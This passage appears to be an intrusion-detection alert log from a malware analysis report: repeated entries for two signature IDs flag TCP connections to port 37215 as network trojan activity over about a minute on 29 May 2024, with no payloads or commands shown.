                SID:2829579
                Source Port:34612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.729033
                SID:2835222
                Source Port:38018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361766
                SID:2835222
                Source Port:36530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091057
                SID:2829579
                Source Port:40822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547380
                SID:2829579
                Source Port:59622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833671
                SID:2829579
                Source Port:48972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464512
                SID:2829579
                Source Port:45042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856004
                SID:2829579
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141817
                SID:2829579
                Source Port:51738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165228
                SID:2835222
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841487
                SID:2829579
                Source Port:40986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010894
                SID:2829579
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978395
                SID:2835222
                Source Port:55394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864391
                SID:2829579
                Source Port:40926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873157
                SID:2835222
                Source Port:33082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813049
                SID:2829579
                Source Port:46844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369116
                SID:2835222
                Source Port:48246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653202
                SID:2829579
                Source Port:35836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129581
                SID:2829579
                Source Port:38638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969745
                SID:2829579
                Source Port:57598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556758
                SID:2829579
                Source Port:37436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813164
                SID:2829579
                Source Port:40500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826839
                SID:2835222
                Source Port:58662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779652
                SID:2829579
                Source Port:49172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912644
                SID:2835222
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915114
                SID:2835222
                Source Port:48180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226726
                SID:2829579
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108873
                SID:2829579
                Source Port:48590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074765
                SID:2835222
                Source Port:34150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574490
                SID:2835222
                Source Port:48314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705014
                SID:2829579
                Source Port:41376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326154
                SID:2829579
                Source Port:34498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912391
                SID:2835222
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507202
                SID:2835222
                Source Port:40128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.609154
                SID:2835222
                Source Port:45696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688181
                SID:2835222
                Source Port:41048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008946
                SID:2829579
                Source Port:56546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787886
                SID:2835222
                Source Port:35368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380276
                SID:2835222
                Source Port:46150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550563
                SID:2835222
                Source Port:53010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281714
                SID:2829579
                Source Port:51402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.469607
                SID:2835222
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461945
                SID:2829579
                Source Port:51800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499085
                SID:2835222
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102954
                SID:2835222
                Source Port:38498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421040
                SID:2829579
                Source Port:45858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944899
                SID:2835222
                Source Port:49944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726065
                SID:2835222
                Source Port:55796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137052
                SID:2835222
                Source Port:54106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928773
                SID:2829579
                Source Port:48398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726102
                SID:2835222
                Source Port:37754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610072
                SID:2835222
                Source Port:43194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836452
                SID:2835222
                Source Port:33160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041263
                SID:2829579
                Source Port:49612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.112961
                SID:2835222
                Source Port:58598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.082785
                SID:2829579
                Source Port:38820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209913
                SID:2835222
                Source Port:56480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212299
                SID:2829579
                Source Port:49194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686734
                SID:2829579
                Source Port:36736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224661
                SID:2829579
                Source Port:59210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414133
                SID:2829579
                Source Port:47862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441975
                SID:2835222
                Source Port:51696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230141
                SID:2835222
                Source Port:38958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716741
                SID:2835222
                Source Port:46030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561122
                SID:2835222
                Source Port:37712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745354
                SID:2835222
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722236
                SID:2829579
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652239
                SID:2835222
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843522
                SID:2835222
                Source Port:49448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264648
                SID:2829579
                Source Port:35850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900427
                SID:2829579
                Source Port:40218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222929
                SID:2829579
                Source Port:48424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230928
                SID:2829579
                Source Port:53650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597616
                SID:2829579
                Source Port:45744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615134
                SID:2835222
                Source Port:47030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141581
                SID:2829579
                Source Port:43786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257039
                SID:2835222
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726372
                SID:2829579
                Source Port:33728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518070
                SID:2829579
                Source Port:48222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859695
                SID:2829579
                Source Port:45768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417370
                SID:2829579
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288469
                SID:2835222
                Source Port:52458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582826
                SID:2835222
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440005
                SID:2835222
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420365
                SID:2835222
                Source Port:40314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059955
                SID:2829579
                Source Port:57052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732017
                SID:2829579
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652768
                SID:2829579
                Source Port:47068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.861391
                SID:2835222
                Source Port:33110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787333
                SID:2835222
                Source Port:54596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224322
                SID:2829579
                Source Port:47946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189913
                SID:2829579
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369572
                SID:2835222
                Source Port:49634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983786
                SID:2829579
                Source Port:40634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464031
                SID:2835222
                Source Port:57156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651740
                SID:2835222
                Source Port:39264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558549
                SID:2829579
                Source Port:51032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514687
                SID:2835222
                Source Port:40012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378785
                SID:2835222
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862176
                SID:2829579
                Source Port:54492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979840
                SID:2829579
                Source Port:46234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649732
                SID:2835222
                Source Port:33544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221767
                SID:2829579
                Source Port:43820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563531
                SID:2829579
                Source Port:53974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802974
                SID:2835222
                Source Port:48292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873620
                SID:2829579
                Source Port:46572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887545
                SID:2829579
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011059
                SID:2829579
                Source Port:33584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182666
                SID:2829579
                Source Port:53990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783763
                SID:2829579
                Source Port:36508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440380
                SID:2829579
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030417
                SID:2835222
                Source Port:47094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734581
                SID:2829579
                Source Port:34284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432082
                SID:2835222
                Source Port:48318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783841
                SID:2829579
                Source Port:40442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537584
                SID:2835222
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223240
                SID:2835222
                Source Port:46094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145064
                SID:2835222
                Source Port:39758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969642
                SID:2835222
                Source Port:59530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583579
                SID:2835222
                Source Port:40476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979469
                SID:2829579
                Source Port:51552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.396099
                SID:2835222
                Source Port:56142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947220
                SID:2835222
                Source Port:45580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944722
                SID:2835222
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220810
                SID:2829579
                Source Port:35764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468770
                SID:2835222
                Source Port:41638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824293
                SID:2829579
                Source Port:57014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908446
                SID:2829579
                Source Port:45320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722254
                SID:2835222
                Source Port:58498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136800
                SID:2835222
                Source Port:38918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336156
                SID:2835222
                Source Port:40656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929513
                SID:2835222
                Source Port:33038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655128
                SID:2829579
                Source Port:49338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235457
                SID:2835222
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856745
                SID:2829579
                Source Port:42874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665780
                SID:2829579
                Source Port:45466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555719
                SID:2829579
                Source Port:45146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449336
                SID:2829579
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335743
                SID:2835222
                Source Port:34126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583224
                SID:2835222
                Source Port:58306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322904
                SID:2829579
                Source Port:50986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559329
                SID:2835222
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511059
                SID:2829579
                Source Port:45794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169283
                SID:2835222
                Source Port:41354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673478
                SID:2835222
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783381
                SID:2835222
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072426
                SID:2829579
                Source Port:54904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210680
                SID:2829579
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961634
                SID:2835222
                Source Port:38242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597384
                SID:2829579
                Source Port:49872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857306
                SID:2835222
                Source Port:51002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783798
                SID:2829579
                Source Port:51136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931393
                SID:2829579
                Source Port:41852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612279
                SID:2835222
                Source Port:39348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790771
                SID:2835222
                Source Port:44048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840890
                SID:2835222
                Source Port:35994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597396
                SID:2835222
                Source Port:58868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765515
                SID:2835222
                Source Port:59396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506251
                SID:2829579
                Source Port:48296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.861523
                SID:2835222
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380319
                SID:2835222
                Source Port:56292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811852
                SID:2829579
                Source Port:36694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667303
                SID:2835222
                Source Port:49176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612067
                SID:2835222
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893159
                SID:2835222
                Source Port:60752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654685
                SID:2829579
                Source Port:59080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435107
                SID:2835222
                Source Port:53488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361779
                SID:2835222
                Source Port:35040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587178
                SID:2835222
                Source Port:44900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765715
                SID:2835222
                Source Port:43374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437198
                SID:2835222
                Source Port:47562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983307
                SID:2835222
                Source Port:38496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264664
                SID:2829579
                Source Port:52418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902045
                SID:2835222
                Source Port:60204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789287
                SID:2835222
                Source Port:54710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166344
                SID:2829579
                Source Port:60604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984723
                SID:2829579
                Source Port:34004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898375
                SID:2829579
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223432
                SID:2835222
                Source Port:39932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507536
                SID:2835222
                Source Port:58958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981781
                SID:2829579
                Source Port:42780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532353
                SID:2835222
                Source Port:47082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265363
                SID:2829579
                Source Port:51992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738560
                SID:2829579
                Source Port:42186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965419
                SID:2829579
                Source Port:51246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810577
                SID:2835222
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869492
                SID:2829579
                Source Port:53342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374418
                SID:2829579
                Source Port:49804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.741727
                SID:2835222
                Source Port:35810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650556
                SID:2829579
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958389
                SID:2835222
                Source Port:40900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160424
                SID:2829579
                Source Port:52768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414106
                SID:2835222
                Source Port:35424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262505
                SID:2835222
                Source Port:46382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962205
                SID:2829579
                Source Port:36418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286268
                SID:2835222
                Source Port:50306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133695
                SID:2829579
                Source Port:38652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333649
                SID:2829579
                Source Port:35540
                Destination Port:37215
